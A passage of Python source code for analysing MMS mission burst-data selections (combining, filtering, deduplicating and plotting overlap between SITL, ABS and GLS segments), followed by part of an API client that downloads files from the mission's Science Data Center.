true, the burst selections were made by the SITL and\n there are back structure submissions to take into\n consideration\n\n Returns\n -------\n results : list of BurstSegments\n The latest burst selections\n '''\n result = []\n for orbit in range(orbit_start, orbit_stop + 1):\n # The start and end times of the sub-regions of interest.\n # These are the times in which selections can be made for\n # any given orbit.\n\n # SROI information is not available before orbit 239.\n # The first SROI is defined on 2015-11-06, which is only a\n # couple of months after formal science data collection began\n # on 2015-09-01.\n\n # However, similar information is available starting at\n # 2015-08-10 (orbit 151) in the science_roi event type. It's\n # nearly equivalent because there was only a single SROI per\n # orbit during the earlier mission phases, but science_roi is\n # the span across all spacecraft.\n if orbit < 239:\n sroi = mission_events('science_roi', orbit, orbit)\n else:\n sroi = mission_events('sroi', orbit, orbit)\n tstart = min(sroi['tstart'])\n tend = max(sroi['tend'])\n\n # The SITL Window is not defined as of orbit 1098, when\n # a SITL-defined window was implemented\n if orbit >= 1098:\n sitl = False\n\n # Need to know when the SITL window closes in order to\n # keep submissions to the back structure.\n if sitl:\n sitl_window = mission_events('sitl_window', orbit, orbit)\n\n # Find the burst segments that were selected within the\n # current SROI\n create_time = None\n orbit_segments = []\n for idx, segment in enumerate(data):\n # Filter out selections from the previous orbit(s)\n # Stop when we get to the next orbit\n if segment.tstop < tstart:\n continue\n if segment.tstart > tend:\n break\n\n # Initialize with the first segment within the orbit.\n # Create times are the same for all selections within\n # a single submission. There may be several submissions\n # per orbit.\n if create_time is None:\n create_time = segment.createtime\n\n # Keep segments from the same submission (create time).\n # If there is a new submission within the orbit, take\n # selections from the new submission and discard those\n # from the old.\n #\n # Submissions to the back structure occur after the\n # SITL window has closed and are in addition to whatever\n # the latest submission was.\n #\n # GLS and ABS selections can occur after the SITL window\n # closes, but those are treated the same as selections\n # made within the SITL window.\n if abs(create_time - segment.createtime) < dt.timedelta(seconds=10):\n orbit_segments.append(segment)\n elif segment.createtime > create_time:\n if sitl and (segment.createtime > sitl_window['tend'][0]):\n orbit_segments.append(segment)\n else:\n create_time = segment.createtime\n orbit_segments = [segment]\n else:\n continue\n\n # Truncate the segments and append this orbit's submissions\n # to the overall results.\n data = data[idx:]\n result.extend(orbit_segments)\n\n return result\n\n\ndef _mission_events_to_burst_segment(data):\n '''\n Turn selections created by `MrMMS_SDC_API.mission_events` and turn\n them into `BurstSegment` instances.\n\n Parameters\n ----------\n data : dict\n Data associated with each burst segment\n\n Returns\n -------\n result : list of `BurstSegment`\n Data converted to `BurstSegment` instances\n '''\n raise NotImplementedError\n\n\ndef _sitl_selections_to_burst_segment(data):\n '''\n Turn selections created by `MrMMS_SDC_API.sitl_selections` and turn\n them into `BurstSegment` instances.\n\n Parameters\n ----------\n data : dict\n Data associated with each burst segment\n\n Returns\n -------\n result : list of `BurstSegment`\n Data converted to `BurstSegment` instances\n '''\n result = []\n for idx in range(len(data['fom'])):\n result.append(BurstSegment(data['tstart'][idx], data['tstop'][idx],\n data['fom'][idx], data['discussion'][idx],\n sourceid=data['sourceid'][idx],\n createtime=data['createtime'][idx],\n )\n )\n return result\n\n\ndef combine_segments(data, dt_contig=0):\n '''\n Combine contiguous burst selections into single selections.\n\n Parameters\n ----------\n data : list of `BurstSegment`\n Selections to be combined.\n dt_contig : int\n Time interval between adjacent selections. For selections\n returned by `pymms.sitl_selections()`, this is 0. For selections\n returned by `pymms.burst_data_segment()`, this is 10.\n '''\n # Any time delta > dt_contig sec indicates the end of a contiguous interval\n t_deltas = [(seg1.tstart - seg0.tstop).total_seconds()\n for seg1, seg0 in zip(data[1:], data[:-1])\n ]\n\n # Time deltas has one fewer element than data at this stage. Append\n # infinity to the time deltas to indicate that the last element in data\n # does not have a contiguous neighbor. This will make the number of\n # elements in each array equal UNLESS data is empty. Do not append if\n # data is empty (to avoid indexing errors below).\n if len(data) > 0:\n t_deltas.append(1000)\n\n icontig = 0 # Current contiguous interval\n result = []\n\n # Check if adjacent elements are continuous in time\n # - Use itertools.islice to select start index without copying array\n for idx, t_delta in enumerate(t_deltas):\n # Contiguous segments are separated by dt_contig seconds.\n # The last element of t_delta = 1000, so not pass this\n # condition and idx+1 will not cause an IndexError\n if t_delta == dt_contig:\n # And unique segments have the same fom and discussion\n if (data[icontig].fom == data[idx + 1].fom) and \\\n (data[icontig].discussion == data[idx + 1].discussion):\n continue\n\n # End of a contiguous interval\n data[icontig].tstop = data[idx].tstop\n\n # Next interval\n icontig = icontig + 1\n\n # Move data for new contiguous segments to beginning of array\n try:\n data[icontig] = data[idx + 1]\n except IndexError:\n pass\n\n # Truncate data beyond last contiguous interval\n del data[icontig:]\n\n\ndef filter_segments(data, filter, case_sensitive=False):\n '''\n Filter burst selections by their discussion string.\n\n Parameters\n ----------\n data : dict\n Selections to be combined. Must have key 'discussion'.\n filter : str\n Regular expression used to filter the data\n case_sensitive : bool\n Make the filter case sensitive\n '''\n # Make case-insensitive searches the default\n flags = re.IGNORECASE\n if case_sensitive:\n flags = 0\n\n return [seg\n for seg in data\n if re.search(filter, seg.discussion, flags)]\n\n\ndef plot_metric(ref_data, test_data, fig, labels, location,\n nbins=10):\n '''\n Visualize the overlap between segments.\n\n Parameters\n ----------\n ref_data : list of `BurstSegment`s\n Reference burst segments\n test_data : list of `BurstSegment`s\n Test burst segments. Determine which test segments\n overlap with the reference segments and by how much\n labels : tuple of str\n Labels for the reference and test segments\n location : tuple\n Location of the figure (row, col, nrows, ncols)\n nbins : int\n Number of histogram bins to create\n\n Returns:\n --------\n ax : `matplotlib.pyplot.Axes`\n Axes in which data is displayed\n ref_test_data : list of `BurstSegment`s\n Reference data that falls within the [start, stop] times\n of the test data.\n '''\n\n # Determine by how much the test data overlaps with\n # the reference data.\n ref_test = []\n ref_test_data = []\n ref_test = [selection_overlap(segment, test_data)\n for segment in ref_data]\n\n # Overlap statistics\n # - Number of segments selected\n # - Percentage of segments selected\n # - Percent overlap from each segment\n ref_test_selected = sum(selection['n_selections'] > 0\n for selection in ref_test)\n ref_test_pct_selected = ref_test_selected / len(ref_test) * 100.0\n ref_test_pct_overlap = [selection['pct_overlap'] for selection in ref_test]\n\n # Calculate the plot index from the (row,col) subplot location\n plot_idx = lambda rowcol, ncols: (rowcol[0] - 1) * ncols + rowcol[1]\n\n # Create a figure\n ax = fig.add_subplot(location[2], location[3],\n plot_idx(location[0:2], location[3]))\n hh = ax.hist(ref_test_pct_overlap, bins=nbins, range=(0, 100))\n # ax.set_xlabel('% Overlap Between {0} and {1} Segments'.format(*labels))\n if location[0] == location[2]:\n ax.set_xlabel('% Overlap per Segment')\n if location[1] == 1:\n ax.set_ylabel('Occurrence')\n ax.text(0.5, 0.98, '{0:4.1f}% of {1:d}'\n .format(ref_test_pct_selected, len(ref_test)),\n verticalalignment='top', horizontalalignment='center',\n transform=ax.transAxes)\n ax.set_title('{0} Segments\\nSelected by {1}'.format(*labels))\n\n return ax, ref_test\n\n\ndef metric(sroi=None, output_dir=None, figtype=None):\n do_sroi = False\n if sroi in (1, 2, 3):\n do_sroi = True\n\n if output_dir is None:\n output_dir = pathlib.Path('~/').expanduser()\n else:\n output_dir = pathlib.Path(output_dir).expanduser()\n\n starttime = dt.datetime(2019, 10, 17)\n\n # Find SROI\n # start_date, end_date = gls_get_sroi(starttime)\n start_date = dt.datetime(2019, 10, 19)\n # end_date = start_date + dt.timedelta(days=5)\n end_date = dt.datetime.now()\n\n abs_data = selections('abs', start_date, end_date,\n latest=True, combine=True, metadata=do_sroi)\n\n gls_data = selections('mp-dl-unh', start_date, end_date,\n latest=True, combine=True, metadata=do_sroi)\n\n sitl_data = selections('sitl+back', start_date, end_date,\n latest=True, combine=True, metadata=do_sroi)\n\n # Filter by SROI\n if do_sroi:\n abs_data = [s for s in abs_data if s.sroi == sroi]\n sitl_data = [s for s in sitl_data if s.sroi == sroi]\n gls_data = [s for s in gls_data if s.sroi == sroi]\n\n sitl_mp_data = filter_segments(sitl_data, '(MP|Magnetopause)')\n\n # Create a figure\n nbins = 10\n nrows = 4\n ncols = 3\n fig = plt.figure(figsize=(8.5, 10))\n fig.subplots_adjust(hspace=0.55, wspace=0.3)\n\n # GLS-SITL Comparison\n ax, gls_sitl = plot_metric(gls_data, sitl_data, fig,\n ('GLS', 'SITL'), (1, 1, nrows, ncols),\n nbins=nbins)\n ax, sitl_gls = plot_metric(sitl_data, gls_data, fig,\n ('SITL', 'GLS'), (2, 1, nrows, ncols),\n nbins=nbins)\n ax, gls_sitl_mp = plot_metric(gls_data, sitl_mp_data, fig,\n ('GLS', 'SITL MP'), (3, 1, nrows, ncols),\n nbins=nbins)\n ax, sitl_mp_gls = plot_metric(sitl_mp_data, gls_data, fig,\n ('SITL MP', 'GLS'), (4, 1, nrows, ncols),\n nbins=nbins)\n\n # ABS-SITL Comparison\n ax, abs_sitl = plot_metric(abs_data, sitl_data, fig,\n ('ABS', 'SITL'), (1, 2, nrows, ncols),\n nbins=nbins)\n ax, sitl_abs = plot_metric(sitl_data, abs_data, fig,\n ('SITL', 'ABS'), (2, 2, nrows, ncols),\n nbins=nbins)\n ax, abs_sitl_mp = plot_metric(abs_data, sitl_mp_data, fig,\n ('ABS', 'SITL MP'), (3, 2, nrows, ncols),\n nbins=nbins)\n ax, sitl_mp_abs = plot_metric(sitl_mp_data, abs_data, fig,\n ('SITL MP', 'ABS'), (4, 2, nrows, ncols),\n nbins=nbins)\n\n # GLS-ABS Comparison\n abs_mp_data = [abs_data[idx]\n for idx, s in enumerate(abs_sitl_mp)\n if s['n_selections'] > 0]\n\n ax, gls_abs = plot_metric(gls_data, abs_data, fig,\n ('GLS', 'ABS'), (1, 3, nrows, ncols),\n nbins=nbins)\n ax, abs_gls = plot_metric(abs_data, gls_data, fig,\n ('ABS', 'GLS'), (2, 3, nrows, ncols),\n nbins=nbins)\n ax, gls_abs_mp = plot_metric(gls_data, abs_mp_data, fig,\n ('GLS', 'ABS MP'), (3, 3, nrows, ncols),\n nbins=nbins)\n ax, abs_mp_gls = plot_metric(abs_mp_data, gls_data, fig,\n ('ABS MP', 'GLS'), (4, 3, nrows, ncols),\n nbins=nbins)\n\n # Save the figure\n if figtype is not None:\n sroi_str = ''\n if do_sroi:\n sroi_str = '_sroi{0:d}'.format(sroi)\n filename = (output_dir\n / '_'.join(('selections_metric' + sroi_str,\n start_date.strftime('%Y%m%d%H%M%S'),\n end_date.strftime('%Y%m%d%H%M%S')\n )))\n filename = filename.with_suffix('.' + figtype)\n plt.savefig(filename.expanduser())\n\n plt.show()\n\n\ndef print_segments(data, full=False):\n '''\n Print details of the burst selections.\n\n Parameters\n ----------\n data : `BurstSegment` or list of `BurstSegment`\n Selections to be printed. Must have keys 'tstart', 'tstop',\n 'fom', 'sourceid', and 'discussion'\n '''\n if full:\n source_len = max(len(s.sourceid) for s in data)\n source_len = max(source_len, 8)\n header_fmt = '{0:>19} {1:>19} {2:>19} {3:>5} ' \\\n '{4:>19} {5:>' + str(source_len) + '} {6}'\n data_fmt = '{0:>19} {1:>19} {2:>19} {3:5.1f} ' \\\n '{4:>19}, {5:>' + str(source_len) + '} {6}'\n print(header_fmt.format('TSTART', 'TSTOP', 'CREATETIME',\n 'FOM', 'STATUS', 'SOURCEID', 'DISCUSSION'\n )\n )\n for s in data:\n try:\n status = s.status\n except AttributeError:\n status = ''\n\n createtime = dt.datetime.strftime(s.createtime,\n '%Y-%m-%d %H:%M:%S')\n print(data_fmt.format(s.start_time, s.stop_time,\n createtime, s.fom, status, s.sourceid,\n s.discussion)\n )\n return\n\n print('{0:>19} {1:>19} {2} {3}'\n .format('TSTART', 'TSTOP', 'FOM', 'DISCUSSION')\n )\n\n if isinstance(data, list):\n for selection in data:\n print(selection)\n else:\n print(data)\n\n\ndef read_csv(filename, start_time=None, stop_time=None, header=True):\n '''\n Read a CSV file with burst segment selections.\n\n Parameters\n ----------\n filename : str\n The name of the file to which `data` is to be read\n start_time : str or `datetime.datetime`\n Filter results to contain segments selected on or\n after this time. Possible only if `header` is True\n and if a column is named `'start_time'`\n stop_time : str or `datetime.datetime`\n Filter results to contain segments selected on or\n before this time. Possible only if `header` is True\n and if a column is named `'stop_time'`\n header : bool\n If `True`, the csv file has a header indicating the\n names of each column. If `header` is `False`, the\n assumed column names are 'start_time', 'stop_time',\n 'fom', 'sourceid', 'discussion', 'createtime'.\n\n Returns\n -------\n data : list of `BurstSegment`\n Burst segments read from the csv file\n '''\n # Convert time itnerval to datetimes if needed\n if isinstance(start_time, str):\n start_time = dt.datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n if isinstance(stop_time, str):\n stop_time = dt.datetime.strptime(stop_time, '%Y-%m-%d %H:%M:%S')\n\n file = pathlib.Path(filename)\n data = []\n\n # Read the file\n with open(file.expanduser(), 'r', newline='') as csvfile:\n csvreader = csv.reader(csvfile)\n\n # Take column names from file header\n if header:\n keys = next(csvreader)\n\n # Read the rows\n for row in csvreader:\n # Select the data within the time interval\n if start_time is not None:\n tstart = dt.datetime.strptime(row[0],\n '%Y-%m-%d %H:%M:%S')\n if tstart < start_time:\n continue\n if stop_time is not None:\n tstop = dt.datetime.strptime(row[1],\n '%Y-%m-%d %H:%M:%S')\n if tstop > stop_time:\n continue # BREAK if sorted!!\n\n # Initialize segment with required fields then add\n # additional fields after\n data.append(BurstSegment(row[0], row[1], float(row[2]), row[4],\n sourceid=row[3], createtime=row[5]\n )\n )\n\n return data\n\n\ndef remove_duplicate_segments(data):\n '''\n If SITL or GLS selections are submitted multiple times,\n there can be multiple copies of the same selection, or\n altered selections that overlap with what was selected\n previously. Find overlapping segments and select those\n from the most recent file, as indicated by the file name.\n\n Parameters\n ----------\n data : list of `BurstSegment`\n Selections from which to prude duplicates. Segments\n must be sorted by `tstart`.\n\n Returns\n -------\n results : list of `BurstSegments`\n Unique burst segments.\n '''\n results = data.copy()\n overwrite_times = set()\n for idx, segment in enumerate(data):\n iahead = idx + 1\n\n # Segments should already be sorted. Future segments\n # overlap with current segment if the future segement\n # start time is closer to the current segment start\n # time than is the current segment's end time.\n while ((iahead < len(data)) and\n ((data[iahead].tstart - segment.tstart) <\n (segment.tstop - segment.tstart))\n ):\n\n # Remove the segment with the earlier create time\n if segment.createtime < data[iahead].createtime:\n remove_segment = segment\n overwrite_time = segment.createtime\n else:\n remove_segment = data[iahead]\n overwrite_time = data[iahead].createtime\n\n # The segment may have already been removed if\n # there are more than one other segments that\n # overlap with it.\n try:\n results.remove(remove_segment)\n overwrite_times.add(overwrite_time)\n except ValueError:\n pass\n\n iahead += 1\n\n # Remove all segments with create times in the overwrite set\n # Note that the model results do not appear to be reproducible\n # so that every time the model is run, a different set of\n # selections are created. Using the filter below, data from\n # whole days can be removed if two processes create overlapping\n # segments at the edges of their time intervals.\n # results = [segment\n # for segment in results\n # if segment.createtime not in overwrite_times\n # ]\n\n print('# Segments Removed: {}'.format(len(data) - len(results)))\n return results\n\n\ndef remove_duplicate_segments_v1(data):\n idx = 0 # current index\n i = idx # look-ahead index\n noverlap = 0\n result = []\n for idx in range(len(data)):\n if idx < i:\n continue\n print(idx)\n\n # Reference segment is the current segment\n ref_seg = data[idx]\n t0_ref = ref_seg.taistarttime\n t1_ref = ref_seg.taiendtime\n dt_ref = t1_ref - t0_ref\n\n if idx == len(data) - 2:\n import pdb\n pdb.set_trace()\n\n try:\n # Test segment are after the reference segment. The\n # test segment overlaps with the reference segment\n # if its start time is closer to the reference start\n # time than is the reference end time. If there is\n # overlap, keep the segment that was created more\n # recently.\n i = idx + 1\n while ((data[i].taistarttime - t0_ref) < dt_ref):\n noverlap += 1\n test_seg = data[i]\n if data[i].createtime > data[idx].createtime:\n ref_seg = test_seg\n i += 1\n except IndexError:\n pass\n\n result.append(ref_seg)\n\n print('# Overlapping Segments: {}'.format(noverlap))\n return result\n\n\ndef selection_overlap(ref, tests):\n '''\n Gather overlap statistics.\n\n Parameters\n ----------\n ref : `selections.BurstSegment`\n The reference burst segment.\n tests : list of `selections.BurstSegment`\n The burst segements against which the reference segment is compared.\n\n Returns\n -------\n out : dict\n Data regarding how much the reference segment overlaps with the\n test segments.\n '''\n out = {'dt': ref.tstop - ref.tstart,\n 'dt_next': dt.timedelta(days=7000),\n 'n_selections': 0,\n 't_overlap': dt.timedelta(seconds=0.0),\n 't_overselect': dt.timedelta(seconds=0.0),\n 'pct_overlap': 0.0,\n 'pct_overselect': 0.0\n }\n\n # Find which selections overlap with the given entry and by how much\n tdelta = dt.timedelta(days=7000)\n for test in tests:\n\n if ((test.tstart <= ref.tstop) and\n (test.tstop >= ref.tstart)\n ):\n out['n_selections'] += 1\n out['t_overlap'] += (min(test.tstop, ref.tstop)\n - max(test.tstart, ref.tstart)\n )\n\n # Time to nearest interval\n out['dt_next'] = min(out['dt_next'], abs(test.tstart - ref.tstart))\n\n # Overlap and over-selection statistics\n if out['n_selections'] > 0:\n out['t_overselect'] = out['dt'] - out['t_overlap']\n out['pct_overlap'] = out['t_overlap'] / out['dt'] * 100.0\n out['pct_overselect'] = out['t_overselect'] / out['dt'] * 100.0\n else:\n out['t_overselect'] = out['dt']\n out['pct_overselect'] = 100.0\n\n return out\n\n\ndef selections(type, start, stop,\n sort=False, combine=False, latest=True, unique=False,\n metadata=False, filter=None, case_sensitive=False):\n '''\n Factory function for burst data selections.\n\n Parameters\n ----------\n type : str\n Type of burst data selections to retrieve. Options are 'abs',\n 'abs-all', 'sitl', 'sitl+back', 'gls', 'mp-dl-unh'.\n start, stop : `datetime.datetime`\n Interval over which to retrieve data\n sort : bool\n Sort burst segments by time. Submissions to the back structure and\n multiple submissions or process executions in one SITL window can\n cause multiples of the same selectoion r out-of-order selections.\n combine : bool\n Combine adjacent selection into one selection. Due to downlink\n limitations, long time duration burst segments must be broken into\n smaller chunks.\n latest : bool\n For each SROI, keep only those times with the most recent time\n of creation. Cannot be used with `unique`.\n metadata : bool\n Retrieve the orbit number and time interval, SROI number and time\n interval, and SITL window time interval.\n unique : bool\n Return only unique segments. See `sort`. Also, a SITL may adjust\n the time interval of their selections, so different submissions will\n have duplicates selections but with different time stamps. This is\n accounted for.\n filter : str\n Filter the burst segments by applying the regular expression to\n the segment's discussions string.\n\n Returns\n -------\n results : list of `BurstSegment`\n Each burst segment.\n '''\n return _get_selections(type, start, stop,\n sort=sort, combine=combine, unique=unique,\n latest=latest, metadata=metadata,\n filter=filter, case_sensitive=case_sensitive)\n\n\ndef sort_segments(data, createtime=False):\n '''\n Sort abs, sitl, or gls selections into ascending order.\n\n Parameters\n ----------\n data : list of `BurstSegement`\n Selections to be sorted. Must have keys 'start_time', 'end_time',\n 'fom', 'discussion', 'tstart', and 'tstop'.\n createtime: bool\n Sort by time created instead of by selection start time.\n\n Returns\n -------\n results : list of `BurstSegement`\n Inputs sorted by time\n '''\n if createtime:\n return sorted(data, key=lambda x: x.createtime)\n return sorted(data, key=lambda x: x.tstart)\n\n\ndef write_csv(filename, data, append=False):\n '''\n Write a CSV file with burst data segment selections.\n\n Parameters\n ----------\n filename : str\n The name of the file to which `data` is to be written\n data : list of `BurstSegment`\n Burst segments to be written to the csv file\n append : bool\n If True, `data` will be appended to the end of the file.\n '''\n header = ('start_time', 'stop_time', 'fom', 'sourceid',\n 'discussion', 'createtime')\n\n mode = 'w'\n if append:\n mode = 'a'\n\n file = pathlib.Path(filename)\n with open(file.expanduser(), mode, newline='') as csvfile:\n csvwriter = csv.writer(csvfile)\n\n if not append:\n csvwriter.writerow(header)\n\n for segment in data:\n csvwriter.writerow([segment.start_time,\n segment.stop_time,\n segment.fom,\n segment.sourceid,\n segment.discussion,\n segment.createtime\n ]\n )\n\n\nif __name__ == 'main':\n from heliopy import config\n import pathlib\n\n # Inputs\n sc = sys.argv[0]\n start_date = sys.argv[1]\n if len(sys.argv) == 3:\n dir = sys.argv[2]\n else:\n dir = pathlib.Path(config['download_dir']) / 'figures' / 'mms'\n\n start_date = dt.datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S')\n\n # Plot the data\n fig = plot_context(sc, start_date, dir=dir)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#instead of importing util we will paste util in and define selections and mrmms_sdc_api as functions before it\n\n# the following are the functions from selections that we will need.\n\n\n# the following are the functions from mrmms_sdc_api that we will need.\nimport glob\nimport os\nimport io\nimport re\nimport requests\nimport csv\nimport pymms as pymms\nfrom tqdm import tqdm\nimport datetime as dt\nimport numpy as np\nfrom cdflib import epochs\nfrom urllib.parse import parse_qs\nimport urllib3\nimport warnings\nfrom scipy.io import readsav\nfrom getpass import getpass\nfrom pathlib import Path\n\n\n# data_root = pymms.config['data_root']\n# dropbox_root = pymms.config['dropbox_root']\n# mirror_root = pymms.config['mirror_root']\ndata_root = Path(\"\"\" /Users/Riley/PycharmProjects/mms_data/heliopy/heliopy/data/mms \"\"\")\n#dropbox_root = ~/data/mms/dropbox\nmirror_root = None\n\nmms_username = None\nmms_password = None\n\n\nclass MrMMS_SDC_API:\n \"\"\"Interface with NASA's MMS SDC API\n\n Interface with the Science Data Center (SDC) API of the\n Magnetospheric Multiscale (MMS) mission.\n https://lasp.colorado.edu/mms/sdc/public/\n\n Params:\n sc (str,list): Spacecraft IDs ('mms1', 'mms2', 'mms3', 'mms4')\n instr (str,list): Instrument IDs\n mode (str,list): Data rate mode ('slow', 'fast', 'srvy', 'brst')\n level (str,list): Data quality level ('l1a', 'l1b', 'sitl', 'l2pre', 'l2', 'l3')\n data_type (str): Type of data ('ancillary', 'hk', 'science')\n end_date (str): End date of data interval, formatted as either %Y-%m-%d or\n %Y-%m-%dT%H:%M:%S.\n files (str,list): File names. If set, automatically sets `sc`, `instr`, `mode`,\n `level`, `optdesc` and `version` to None.\n offline (bool): Do not search for file information online.\n optdesc (str,list): Optional file name descriptor\n site (str): SDC site to use ('public', 'private'). Setting `level`\n automatically sets `site`. If `level` is 'l2' or 'l3', then\n `site`='public' otherwise `site`='private'.\n start_date (str): Start date of data interval, formatted as either %Y-%m-%d or\n %Y-%m-%dT%H:%M:%S.\n version (str,list): File version numbers.\n \"\"\"\n\n def __init__(self, sc=None, instr=None, mode=None, level=None,\n data_type='science',\n end_date=None,\n files=None,\n offline=False,\n optdesc=None,\n site='public',\n start_date=None,\n version=None):\n\n # Set attributes\n # - Put site before level because level will auto-set site\n # - Put files last because it will reset most fields\n self.site = site\n\n self.data_type = data_type\n self.end_date = end_date\n self.instr = instr\n self.level = level\n self.mode = mode\n self.offline = offline\n self.optdesc = optdesc\n self.sc = sc\n self.start_date = start_date\n self.version = version\n\n self.files = files\n\n self._data_root = data_root\n #self._dropbox_root = dropbox_root\n self._mirror_root = mirror_root\n self._sdc_home = 'https://lasp.colorado.edu/mms/sdc'\n self._info_type = 'download'\n\n # Create a persistent session\n self._session = requests.Session()\n if (mms_username is not None) and (mms_password is not None):\n self._session.auth = (mms_username, mms_password)\n\n def __str__(self):\n return self.url()\n\n # https://stackoverflow.com/questions/17576009/python-class-property-use-setter-but-evade-getter\n def __setattr__(self, name, value):\n \"\"\"Control attribute values as they are set.\"\"\"\n\n # TYPE OF INFO\n # - Unset other complementary options\n # - Ensure that at least one of (download | file_names |\n # version_info | file_info) are true\n if name == 'data_type':\n if 'gls_selections' in value:\n if value[15:] not in ('mp-dl-unh',):\n raise ValueError('Unknown GLS Selections type.')\n elif value not in ('ancillary', 'hk', 'science',\n 'abs_selections', 'sitl_selections',\n 'bdm_sitl_changes'):\n raise ValueError('Invalid value {} for attribute'\n ' \"{}\".'.format(value, name))\n\n # Unset attributes related to data_type = 'science'\n if 'selections' in value:\n self.sc = None\n self.instr = None\n self.mode = None\n self.level = None\n self.optdesc = None\n self.version = None\n\n elif name == 'files':\n if value is not None:\n # Keep track of site because setting\n # self.level = None will set self.site = 'public'\n site = self.site\n self.sc = None\n self.instr = None\n self.mode = None\n self.level = None\n self.optdesc = None\n self.version = None\n self.site = site\n\n elif name == 'level':\n # L2 and L3 are the only public data levels\n if value in [None, 'l2', 'l3']:\n self.site = 'public'\n else:\n self.site = 'private'\n\n elif name == 'site':\n # Team site is most commonly referred to as the \"team\",\n # or \"private\" site, but in the URL is referred to as the\n # \"sitl\" site. Accept any of these values.\n if value in ('private', 'team', 'sitl'):\n value = 'sitl'\n elif value == 'public':\n value = 'public'\n else:\n raise ValueError('Invalid value for attribute {}.'\n .format(name)\n )\n\n elif name in ('start_date', 'end_date'):\n # Convert string to datetime object\n if isinstance(value, str):\n try:\n value = dt.datetime.strptime(value[0:19],\n '%Y-%m-%dT%H:%M:%S'\n )\n except ValueError:\n try:\n value = dt.datetime.strptime(value, '%Y-%m-%d')\n except ValueError:\n raise\n\n # Set the value\n super(MrMMS_SDC_API, self).__setattr__(name, value)\n\n def url(self, query=True):\n \"\"\"\n Build a URL to query the SDC.\n\n Parameters\n ----------\n query : bool\n If True (default), add the query string to the url.\n\n Returns\n -------\n url : str\n URL used to retrieve information from the SDC.\n \"\"\"\n sep = '/'\n url = sep.join((self._sdc_home, self.site, 'files', 'api', 'v1',\n self._info_type, self.data_type))\n\n # Build query from parts of file names\n if query:\n query_string = '?'\n qdict = self.query()\n for key in qdict:\n query_string += key + '=' + qdict[key] + '&'\n\n # Combine URL with query string\n url += query_string\n\n return url\n\n def check_response(self, response):\n '''\n Check the status code for a requests response and perform\n and appropriate action (e.g. log-in, raise error, etc.)\n\n Parameters\n ----------\n response : `requests.response`\n Response from the SDC\n\n Returns\n -------\n r : `requests.response`\n Updated response\n '''\n\n # OK\n if response.status_code == 200:\n r = response\n\n # Authentication required\n elif response.status_code == 401:\n print('Log-in Required')\n\n maxAttempts = 4\n nAttempts = 1\n while nAttempts <= maxAttempts:\n # First time through will automatically use the\n # log-in information from the config file. If that\n # information is wrong/None, ask explicitly\n if nAttempts == 1:\n self.login(mms_username, mms_password)\n else:\n self.login()\n\n # Remake the request\n # - Ideally, self._session.send(response.request)\n # - However, the prepared request lacks the\n # authentication data\n if response.request.method == 'POST':\n query = parse_qs(response.request.body)\n r = self._session.post(response.request.url, data=query)\n else:\n r = self._session.get(response.request.url)\n\n # Another attempt\n if r.ok:\n break\n else:\n print('Incorrect username or password. %d tries '\n 'remaining.' % maxAttempts - nAttempts)\n nAttempts += 1\n\n # Failed log-in\n if nAttempts > maxAttempts:\n raise ConnectionError('Failed log-in.')\n\n else:\n raise ConnectionError(response.reason)\n\n # Return the resulting request\n return r\n\n def download_files(self):\n '''\n Download files from the SDC. First, search the local file\n system to see if they have already been downloaded.\n\n Returns\n -------\n local_files : list\n Names of the local files.\n '''\n\n # Get available files\n local_files, remote_files = self.search()\n if self.offline:\n return local_files\n\n # Download remote files\n # - file_info() does not want the remote path\n if len(remote_files) > 0:\n remote_files = [file.split('/')[-1] for file in remote_files]\n downloaded_files = self.download_from_sdc(remote_files)\n local_files.extend(downloaded_files)\n\n return local_files\n\n def download_from_sdc(self, file_names):\n '''\n Download multiple files from the SDC. To prevent downloading the\n same file multiple times and to properly filter by file start time\n see the download_files method.\n\n Parameters\n ----------\n file_names : str, list\n File names of the data files to be downloaded. See\n the file_names method.\n\n Returns\n -------\n local_files : list\n Names of the local files. Remote files downloaded\n only if they do not already exist locally\n '''\n\n # Make sure files is a list\n if isinstance(file_names, str):\n file_names = [file_names]\n\n # Get information on the files that were found\n # - To do that, specify the specific files.\n # This sets all other properties to None\n # - Save the state of the object as it currently\n # is so that it can be restored\n # - Setting FILES will indirectly cause SITE='public'.\n # Keep track of SITE.\n state = {}\n state['sc'] = self.sc\n state['instr'] = self.instr\n state['mode'] = self.mode\n state['level'] = self.level\n state['optdesc'] = self.optdesc\n state['version'] = self.version\n state['files'] = self.files\n\n # Get file name and size\n self.files = file_names\n file_info = self.file_info()\n\n # Build the URL sans query\n self._info_type = 'download'\n url = self.url(query=False)\n\n # Amount to download per iteration\n block_size = 1024 * 128\n local_file_names = []\n\n # Download each file individually\n for info in file_info['files']:\n # Create the destination directory\n file = self.name2path(info['file_name'])\n if not os.path.isdir(os.path.dirname(file)):\n os.makedirs(os.path.dirname(file))\n\n # downloading: https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py\n # progress bar: https://stackoverflow.com/questions/37573483/progress-bar-while-download-file-over-http-with-requests\n try:\n r = self._session.get(url,\n params={'file': info['file_name']},\n stream=True)\n with tqdm(total=info['file_size'],\n unit='B',\n unit_scale=True,\n unit_divisor=1024\n ) as pbar:\n with open(file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=block_size):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n pbar.update(block_size)\n except:\n if os.path.isfile(file):\n os.remove(file)\n for key in state:\n self.files = None\n setattr(self, key, state[key])\n raise\n\n local_file_names.append(file)\n\n # Restore the entry state\n self.files = None\n for key in state:\n setattr(self, key, state[key])\n\n return local_file_names\n\n def download_from_sdc_v1(self, file_names):\n '''\n Download multiple files from the SDC. To prevent downloading the\n same file multiple times and to properly filter by file start time\n see the download_files method.\n\n This version of the program calls `self.file_info()` for each\n file name given, whereas `download_from_sdc_v1` calls it once\n for all files. In the event of many files, `self.get()` was\n altered to use `requests.post()` instead of `requests.get()`\n if the url was too long (i.e. too many files).\n\n Parameters\n ----------\n file_names : str, list\n File names of the data files to be downloaded. See\n the file_names method.\n\n Returns\n -------\n local_files : list\n Names of the local files. Remote files downloaded\n only if they do not already exist locally\n '''\n\n # Make sure files is a list\n if isinstance(file_names, str):\n file_names = [file_names]\n\n # Get information on the files that were found\n # - To do that, specify the specific files.\n # This sets all other properties to None\n # - Save the state of the object as it currently\n # is so that it can be restored\n # - Setting FILES will indirectly cause SITE='public'.\n # Keep track of SITE.\n site = self.site\n state = {}\n state['sc'] = self.sc\n state['instr'] = self.instr\n state['mode'] = self.mode\n state['level'] = self.level\n state['optdesc'] = self.optdesc\n state['version'] = self.version\n state['files'] = 